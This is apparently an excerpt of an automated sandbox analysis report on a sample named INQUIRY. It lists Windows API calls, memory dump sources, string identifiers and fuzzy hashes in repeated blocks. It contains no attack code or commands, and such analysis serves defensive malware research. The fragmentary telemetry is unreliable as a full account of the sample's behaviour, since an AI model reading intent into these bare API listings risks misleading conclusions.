                                                                                              • Instruction Fuzzy Hash: BFB1D975A00109AFDB04DFA4CD98DAEBBB9FF48314F148469E909EB261DB30EE45CB51
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00A6C283
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A6C295
                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A6C2F3
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00A6C2FE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A6C310
                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A6C364
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A6C372
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A6C383
                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A6C3C6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00A6C3D4
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A6C3F1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A6C3FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 1c2b1d2e642e1b3eb2655204ac3427db80e7ca789888f783723df69b3f691cdf
                                                                                              • Instruction ID: f7d41ef104ca564018516c85943289face30cd71d67c3693963f97b3f80df5d3
                                                                                              • Opcode Fuzzy Hash: 1c2b1d2e642e1b3eb2655204ac3427db80e7ca789888f783723df69b3f691cdf
                                                                                              • Instruction Fuzzy Hash: 3C513F71B00205AFDF18CFA9DD99ABEBBBAEB88711F14812DF615D7290DB709D418B10
                                                                                              APIs
                                                                                                • Part of subcall function 00A11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A12036,?,00000000,?,?,?,?,00A116CB,00000000,?), ref: 00A11B9A
                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A120D3
                                                                                              • KillTimer.USER32(-00000001,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A1216E
                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00A4BCA6
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BCD7
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BCEE
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BD0A
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A4BD1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 641708696-0
                                                                                              • Opcode ID: 9f3518a32a6b7d0ca4e584e7e33e4522fe5033c44ca34ccfd8c1fbf2242e533b
                                                                                              • Instruction ID: 219e2c04309a22502eb86b8264f32c7c3dfde67b150f8d2e62540f85e315851f
                                                                                              • Opcode Fuzzy Hash: 9f3518a32a6b7d0ca4e584e7e33e4522fe5033c44ca34ccfd8c1fbf2242e533b
                                                                                              • Instruction Fuzzy Hash: B0617D35A11A00DFCB35DF64D948B6977F2FB84312F14462AE5428A970CB71ECA2EB90
                                                                                              APIs
                                                                                                • Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC
                                                                                              • GetSysColor.USER32(0000000F), ref: 00A121D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 37515370c647926e3c0f2a57e641f1e3a99c32f664741ea7235af38511fabf02
                                                                                              • Instruction ID: 1aeda6dddf11300c68c85a9f2d35690170c74bc8f2558a4c292cc9bdc0234cea
                                                                                              • Opcode Fuzzy Hash: 37515370c647926e3c0f2a57e641f1e3a99c32f664741ea7235af38511fabf02
• Instruction Fuzzy Hash: AD417035200140AEDB259F68DC88BFD3B65EB46331F284366FE658A1E5CB31CC92DB61
APIs
• CharLowerBuffW.USER32(?,?,00A9F910), ref: 00A7A90B
• GetDriveTypeW.KERNEL32(00000061,00AC89A0,00000061), ref: 00A7A9D5
• _wcscpy.LIBCMT ref: 00A7A9FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: e12dea641d80a62836a18521bc42690d3193b86bda511b8587c3005462a016c2
• Instruction ID: 3e4a6fd2320dfc619dc59e110375144f9c497cc1e6a4a86a8181914115528a85
• Opcode Fuzzy Hash: e12dea641d80a62836a18521bc42690d3193b86bda511b8587c3005462a016c2
• Instruction Fuzzy Hash: 3D518B31508301ABC704EF14CEA2AAFB7A5FFD4380F55882DF59A572A2DB319949CB53
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: f38e01bf92a7c3550282e9651f2567de9f17dc8f204046b622af099115da0cee
• Instruction ID: 685ce78a663c3503e05894df9ecf19bedbc46e52135ec4c5005e06456faa932f
• Opcode Fuzzy Hash: f38e01bf92a7c3550282e9651f2567de9f17dc8f204046b622af099115da0cee
• Instruction Fuzzy Hash: 5641C275A04205AFEB24DF74D952EBAB3F8FF45300F20486EF54AD7292EA319981CB11
APIs
• _memset.LIBCMT ref: 00A9716A
• CreateMenu.USER32 ref: 00A97185
• SetMenu.USER32(?,00000000), ref: 00A97194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A97221
• IsMenu.USER32(?), ref: 00A97237
• CreatePopupMenu.USER32 ref: 00A97241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A9726E
• DrawMenuBar.USER32 ref: 00A97276
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 3bfc15d34d7a45dcaf2f4a6fe35470bb0d2a0a5147aff35f4d0f6ff8c217f1cb
• Instruction ID: 1aa24da0c60ccd1437857dfe92c1cd5405e4ed47ac68ce129c1be1346c7c8e2d
• Opcode Fuzzy Hash: 3bfc15d34d7a45dcaf2f4a6fe35470bb0d2a0a5147aff35f4d0f6ff8c217f1cb
• Instruction Fuzzy Hash: 81412374A11209EFDB20DFA4D984EDABBF5FB49310F14002AF905AB361DB31A910DBA0
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A9755E
• CreateCompatibleDC.GDI32(00000000), ref: 00A97565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A97578
• SelectObject.GDI32(00000000,00000000), ref: 00A97580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00A9758B
• DeleteDC.GDI32(00000000), ref: 00A97594
• GetWindowLongW.USER32(?,000000EC), ref: 00A9759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A975B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A975BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: e7763bbd113ff16b12a2a1fa74323c01964edef75da2d9217c5f92f17dd3aa7e
• Instruction ID: 6206efea90b50aaea2113b254891b9d2fa4c30b48f8b6d2be4e76d31d8b5e70d
• Opcode Fuzzy Hash: e7763bbd113ff16b12a2a1fa74323c01964edef75da2d9217c5f92f17dd3aa7e
• Instruction Fuzzy Hash: AF316B72215215BFDF129FA4DC49FDA3BA9FF09360F150225FA15E60A0DB31D822DBA4
APIs
• _memset.LIBCMT ref: 00A36E3E
  • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
• __gmtime64_s.LIBCMT ref: 00A36ED7
• __gmtime64_s.LIBCMT ref: 00A36F0D
• __gmtime64_s.LIBCMT ref: 00A36F2A
• __allrem.LIBCMT ref: 00A36F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A36F9C
• __allrem.LIBCMT ref: 00A36FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A36FD1
• __allrem.LIBCMT ref: 00A36FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A37006
• __invoke_watson.LIBCMT ref: 00A37077
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: 4a24588d7cd50b7c62f5e55fb6255880a20605ec8ba3a436c0a003d902a75baa
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: F97117B6A00717BBEB24EF68DD81B5AB3B8AF45364F148239F514D7281E770DE048B90
APIs
• _memset.LIBCMT ref: 00A72542
• GetMenuItemInfoW.USER32(00AD5890,000000FF,00000000,00000030), ref: 00A725A3
• SetMenuItemInfoW.USER32(00AD5890,00000004,00000000,00000030), ref: 00A725D9
• Sleep.KERNEL32(000001F4), ref: 00A725EB
• GetMenuItemCount.USER32(?), ref: 00A7262F
• GetMenuItemID.USER32(?,00000000), ref: 00A7264B
• GetMenuItemID.USER32(?,-00000001), ref: 00A72675
• GetMenuItemID.USER32(?,?), ref: 00A726BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A72700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A72714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A72735
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: d49b3712164202585209bfd55434108d5765aa18651b1f855132134e9037a1dd
• Instruction ID: bf621677b2a46aee5e851f0585af41d60082f87500d1ab4416937b380e8e5f93
• Opcode Fuzzy Hash: d49b3712164202585209bfd55434108d5765aa18651b1f855132134e9037a1dd
• Instruction Fuzzy Hash: 57619170900249AFDB15CFA4DD84EBE7BB8EB45344F14C16AE846A3251D731AD06DB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A96FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A96FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00A96FCC
• _memset.LIBCMT ref: 00A96FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A96FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A97067
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 7360a8e0364f76263012c6f0dfb7da4df84f6449403c1303d104f71f2dd0bc1a
• Instruction ID: 1b46538f314bf83ecdd98df9e31a2349b2a4bbd6bd0e64aa22bfa0368d115ee2
• Opcode Fuzzy Hash: 7360a8e0364f76263012c6f0dfb7da4df84f6449403c1303d104f71f2dd0bc1a
• Instruction Fuzzy Hash: A7615D75A00208AFDB11DFA4CD81EEE77F8EF09710F10415AFA15AB2A1C771AD45DBA0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A66BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00A66C18
• VariantInit.OLEAUT32(?), ref: 00A66C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00A66C4A
• VariantCopy.OLEAUT32(?,?), ref: 00A66C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00A66CB1
• VariantClear.OLEAUT32(?), ref: 00A66CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00A66CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A66CDC
• VariantClear.OLEAUT32(?), ref: 00A66CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A66CF9
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 7ccb8ebe70008a5bb813867c6b182349c4d20fa8830d59ecb858fe08043e77eb
• Instruction ID: d305578a48a9b8f1225d4c282b1c4955b8dd4839a3c85784d6cd63d90dfe714c
• Opcode Fuzzy Hash: 7ccb8ebe70008a5bb813867c6b182349c4d20fa8830d59ecb858fe08043e77eb
• Instruction Fuzzy Hash: E2413075A00219DFCF04DFA9D9849EEBBB9FF48354F008069E955E7261DB30A946CF90
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00A85793
• inet_addr.WSOCK32(?,?,?), ref: 00A857D8
• gethostbyname.WSOCK32(?), ref: 00A857E4
• IcmpCreateFile.IPHLPAPI ref: 00A857F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A85862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A85878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A858ED
• WSACleanup.WSOCK32 ref: 00A858F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00A7B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A7B546
• GetLastError.KERNEL32 ref: 00A7B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 00A7B5BD
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
  • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A69014
• GetDlgCtrlID.USER32 ref: 00A6901F
• GetParent.USER32 ref: 00A6903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00A6903E
• GetDlgCtrlID.USER32(?), ref: 00A69047
• GetParent.USER32(?), ref: 00A69063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00A69066
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
  • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A690FD
• GetDlgCtrlID.USER32 ref: 00A69108
• GetParent.USER32 ref: 00A69124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00A69127
• GetDlgCtrlID.USER32(?), ref: 00A69130
• GetParent.USER32(?), ref: 00A6914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00A6914F
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
• GetParent.USER32 ref: 00A6916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00A69184
• _wcscmp.LIBCMT ref: 00A69196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A69211
Strings
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
APIs
• VariantInit.OLEAUT32(?), ref: 00A888D7
• CoInitialize.OLE32(00000000), ref: 00A88904
• CoUninitialize.OLE32 ref: 00A8890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00A88A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00A88B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AA2C0C), ref: 00A88B6F
• CoGetObject.OLE32(?,00000000,00AA2C0C,?), ref: 00A88B92
• SetErrorMode.KERNEL32(00000000), ref: 00A88BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A88C25
• VariantClear.OLEAUT32(?), ref: 00A88C35
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A77A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00A711F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A71204
• GetWindowThreadProcessId.USER32(00000000), ref: 00A7120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A7121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A71245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A71257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A7129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A712B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A712BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A1FAA6
• OleUninitialize.OLE32(?,00000000), ref: 00A1FB45
• UnregisterHotKey.USER32(?), ref: 00A1FC9C
• DestroyWindow.USER32(?), ref: 00A545D6
• FreeLibrary.KERNEL32(?), ref: 00A5463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A54668
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 1a3249e7c172d0af51bb413b9771a7ae39c29de7e8cda2aa16fadee6d4d55b8c
• Instruction ID: f7cbd83d2388c230bd2641816c0f991801f2d2992921a031b4af099a268805c9
• Opcode Fuzzy Hash: 1a3249e7c172d0af51bb413b9771a7ae39c29de7e8cda2aa16fadee6d4d55b8c
• Instruction Fuzzy Hash: 82A18134705212CFCB19EF14CA95BA9F364BF09755F1442ADE80AAB261DB30ED96CF90
APIs
• EnumChildWindows.USER32(?,00A6A439), ref: 00A6A377
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: b327d15c03f3ba1ee4503568e6b0fc162b5431324202449d7c5c634b4097db34
• Instruction ID: 021a0b2f49fa15933d412c0f805c86e291a81d4e16e323362a9567bcde86575e
• Opcode Fuzzy Hash: b327d15c03f3ba1ee4503568e6b0fc162b5431324202449d7c5c634b4097db34
• Instruction Fuzzy Hash: DF91A331A04606AACB08DFB0C552BEEFBB8FF24340F549119E85AB7251DF316999CF91
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00A12EAE
  • Part of subcall function 00A11DB3: GetClientRect.USER32(?,?), ref: 00A11DDC
  • Part of subcall function 00A11DB3: GetWindowRect.USER32(?,?), ref: 00A11E1D
  • Part of subcall function 00A11DB3: ScreenToClient.USER32(?,?), ref: 00A11E45
• GetDC.USER32 ref: 00A4CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A4CD45
• SelectObject.GDI32(00000000,00000000), ref: 00A4CD53
• SelectObject.GDI32(00000000,00000000), ref: 00A4CD68
• ReleaseDC.USER32(?,00000000), ref: 00A4CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A4CDFB
